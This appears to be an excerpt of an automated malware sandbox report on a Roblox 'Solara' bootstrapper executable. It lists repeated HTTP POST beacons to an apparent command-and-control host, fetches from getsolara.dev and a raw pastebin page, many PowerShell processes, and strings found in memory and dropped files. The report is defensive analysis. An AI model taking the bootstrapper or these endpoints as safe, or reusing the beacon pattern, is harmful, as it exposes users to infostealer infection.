                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1736Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1724Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: getsolara.dev
                                    Source: global trafficHTTP traffic detected: GET /raw/pjseRvyK HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: pastebin.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: clientsettings.roblox.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: www.nodejs.orgConnection: Keep-Alive
                                    Source: global trafficDNS traffic detected: DNS query: getsolara.dev
                                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                                    Source: global trafficDNS traffic detected: DNS query: clientsettings.roblox.com
                                    Source: global trafficDNS traffic detected: DNS query: www.nodejs.org
                                    Source: global trafficDNS traffic detected: DNS query: 598828cm.n9shka.top
                                    Source: unknownHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:64632b
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientsettings.roblox.com
                                    Source: powershell.exe, 0000002F.00000002.2477459718.000002B1AF100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-term4-fra2.roblox.com
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getsolara.dev
                                    Source: BootstrapperV1.19.exeString found in binary or memory: http://james.newtonking.com/projects/json
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                                    Source: powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, PerfNET.exe, 0000000D.00000002.2160196678.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
